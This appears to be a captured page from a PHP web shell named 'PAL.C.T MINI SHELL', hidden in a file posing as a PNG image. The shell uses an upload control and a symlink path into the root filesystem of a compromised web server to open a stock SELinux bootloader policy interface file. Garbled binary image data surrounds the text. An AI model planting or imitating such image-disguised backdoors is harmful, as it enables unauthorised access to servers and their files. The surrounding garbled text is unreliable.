php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/selinux/devel/include/admin/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/selinux/devel/include/admin/bootloader.if

## <summary>Policy for the kernel modules, kernel image, and bootloader.</summary>

########################################
## <summary>
##	Execute bootloader in the bootloader domain.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
#
interface(`bootloader_domtrans',`
	gen_require(`
		type bootloader_t, bootloader_exec_t;
	')

	domtrans_pattern($1, bootloader_exec_t, bootloader_t)
')

#######################################
## <summary>
##  Execute bootloader in the caller domain.
## </summary>
## <param name="domain">
##  <summary>
##  The type of the process performing this action.
##  </summary>
## </param>
#
interface(`bootloader_exec',`
    gen_require(`
        type bootloader_exec_t;
    ')

    can_exec($1, bootloader_exec_t)
')

########################################
## <summary>
##	Execute bootloader interactively and do
##	a domain transition to the bootloader domain.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
## <param name="role">
##	<summary>
##	The role to be allowed the bootloader domain.
##	</summary>
## </param>
## <rolecap/>
#
interface(`bootloader_run',`
	gen_require(`
		type bootloader_t;
	')

	bootloader_domtrans($1)

	role $2 types bootloader_t;

	ifdef(`distro_redhat',`
		# for mke2fs
		mount_run(bootloader_t, $2)
	')
')

########################################
## <summary>
##	Read the bootloader configuration file.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
#
interface(`bootloader_read_config',`
	gen_require(`
		type bootloader_etc_t;
	')

	allow $1 bootloader_etc_t:file read_file_perms;
    files_read_etc_runtime_files($1)
')

########################################
## <summary>
##	Read and write the bootloader
##	configuration file.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
## <rolecap/>
#
interface(`bootloader_rw_config',`
	gen_require(`
		type bootloader_etc_t;
	')

	allow $1 bootloader_etc_t:file rw_file_perms;
')

########################################
## <summary>
##     Manage the bootloader
##     configuration file.
## </summary>
## <param name="domain">
##     <summary>
##     Domain allowed access.
##     </summary>
## </param>
#
interface(`bootloader_manage_config',`
       gen_require(`
               type bootloader_etc_t;
       ')

       manage_files_pattern($1, bootloader_etc_t, bootloader_etc_t)
')

########################################
## <summary>
##	Read and write the bootloader
##	temporary data in /tmp.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
#
interface(`bootloader_rw_tmp_files',`
	gen_require(`
		type bootloader_tmp_t;
	')

	# FIXME: read tmp_t dir
	allow $1 bootloader_tmp_t:file rw_file_perms;
')

########################################
## <summary>
##	Read and write the bootloader
##	temporary data in /tmp.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
#
interface(`bootloader_create_runtime_file',`
	gen_require(`
		type boot_runtime_t;
	')

	allow $1 boot_runtime_t:file { create_file_perms rw_file_perms };
	files_boot_filetrans($1, boot_runtime_t, file)
')
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`